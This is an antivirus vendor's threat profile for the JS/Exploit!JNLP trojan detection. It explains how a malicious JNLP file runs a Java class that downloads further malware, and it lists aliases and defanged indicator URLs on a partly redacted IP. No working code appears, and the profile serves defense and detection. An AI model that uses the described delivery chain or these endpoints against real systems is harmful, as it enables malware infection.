Virus Profile: JS/Exploit!JNLP

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 5/15/2013
Date Added: 5/15/2013
Origin: Unknown
Length: Varies
Type: Trojan
Subtype: Script
DAT Required: 7076
Removal Instructions
   
 
 
   

Description

This is a Trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Indication of Infection

The exploit may download arbitrary files.
This exploit attempts to download and execute additional malware to the infected system.

Methods of Infection

The infection starts when user visits the compromised website hosted with the .jar files.
   

Virus Characteristics

----------------------------------------Updated on July 26,2013----------------------------

Aliases
  • Norman    -    generic/Blacole.UD
  • Avast         -    HTML:Downloader-FG
  • Microsoft   -    Exploit:JS/Blacole.GB
Characteristics

JS/Exploit!JNLP
is the detection for malicious JNLP xml which has parameter data and class to execute the malicious jar.

The JNLP is a protocol, defined with an XML schema, specifies how to launch Java Web applications. JNLP consists of a set of rules defining how exactly to implement the launching mechanism. JNLP files include information such as the location of the jar package file and the name of the main class for the application, in addition to any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE) which in turn downloads the application onto the user's machine and starts executing it.

The below is the image confirms that the Trojan executes the class “hw” and pass the encrypted URL as parameter.




Upon successful execution the JNLP tries to connect the below URL in order to download the JAR and to execute using the above encrypted URL.
  • [Malicious Domain Name]/news/house_distributes_construct_distance.php?phlgyzg=goeeajoz&axjb=ilm

----------------------------------------Updated on July 23,2013----------------------------
Aliases-
  • Norman    -    generic/Blacole.UD
  • Avast        -    HTML:Downloader-FG
  • Microsoft    -    Exploit:JS/Blacole.GB
JS/Exploit!JNLP is the detection for malicious JNLP xml which has parameter data and class to execute the malicious jar.


The JNLP is a protocol, defined with an XML schema, specifies how to launch Java Web applications. JNLP consists of a set of rules defining how exactly to implement the launching mechanism. JNLP files include information such as the location of the jar package file and the name of the main class for the application, in addition to any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE) which in turn downloads the application onto the user's machine and starts executing it.

The below is the image confirms that the Trojan executes the class “hw” and pass the encrypted URL as parameter.


Upon successful execution the JNLP tries to connect the below URL in order to download the JAR and to execute using the above encrypted URL.

  • [Malicious Domain Name]/news/house_distributes_construct_distance.php?phlgyzg=goeeajoz&axjb=ilm

 --------------------Updated on  July 20, 2013---------------------------

Aliases-
  • Avast        -    HTML:Downloader-FG
  • Norman   -   generic/Blacole.UD
  • Sunbelt    -    LooksLike.JNLP.ExploitLoader.a
JS/Exploit!JNLP is the detection for malicious JNLP xml which has parameter data and class to execute the malicious jar.

The JNLP is a protocol, defined with an XML schema, specifies how to launch Java Web applications. JNLP consists of a set of rules defining how exactly to implement the launching mechanism. JNLP files include information such as the location of the jar package file and the name of the main class for the application, in addition to any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE) which in turn downloads the application onto the user's machine and starts executing it.


The below is the image confirms that the Trojan executes the class “hw” and pass the encrypted URL as parameter.


 

Upon successful execution the JNLP tries to connect the below URL in order to download the JAR and to execute using the above encrypted URL.

  • hxxp://178.[Removed] 57/ac83334991034a44df82327c26eb7e75/ac83334991034a44df82327c26eb7e75/q.php?ef=1m:1j:30:2v:31&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&j=1f&tj=e&gv=e&jopa=4695008
  • hxxp://178.[Removed].57/ ac83334991034a44df82327c26eb7e75/q.php?vlqd=lgvvbanr&byf=qdrjqyf

At the time of analysis the site is down.


--------------------Updated on 6 June 2013---------------------------

JS/Exploit!JNLP
is the detection for malicious JNLP xml which has parameter data and class to execute the malicious jar.
The JNLP is a protocol, defined with an XML schema, specifies how to launch Java Web applications. JNLP consists of a set of rules defining how exactly to implement the launching mechanism. JNLP files include information such as the location of the jar package file and the name of the main class for the application, in addition to any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE) which in turn downloads the application onto the user's machine and starts executing it.

The below is the image confirms that the Trojan executes the class “wh” and pass the encrypted URL as parameter.


 
Upon successful execution of JAR it tries to connect to the malicious URL to download the other payloads.

---------------------Updated on 28 may 2013------------------------

JS/Exploit!JNLP
is the detection for malicious xml which has parameter data to execute the malicious jar.

From the html the malicious xml data will be passed to execute the JAR with help of applet.

The below is the image confirms that the Trojan executes the class “wh” and pass the encrypted URL as parameter to applet.


 
Upon successful execution of JAR it tries to connect to the malicious encrypted URL to download the other payloads.

-------------------------------------------------------------------------
JS/Exploit!JNLP
is the detection for malicious xml which has parameter data to execute the malicious jar.

From the html the malicious xml data will be passed to execute the malware.

The below is the image confirms that the Trojan executes the class “hw” and pass the encrypted URL as parameter.



 
Upon successful execution of JAR it tries to connect to the malicious URL to download the other payloads.
   

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

   

PC Infected? Get Expert Help

McAfee
Virus Removal Service

Connect to one of our Security Experts by phone. Have your PC fixed remotely - while you watch!

$89.95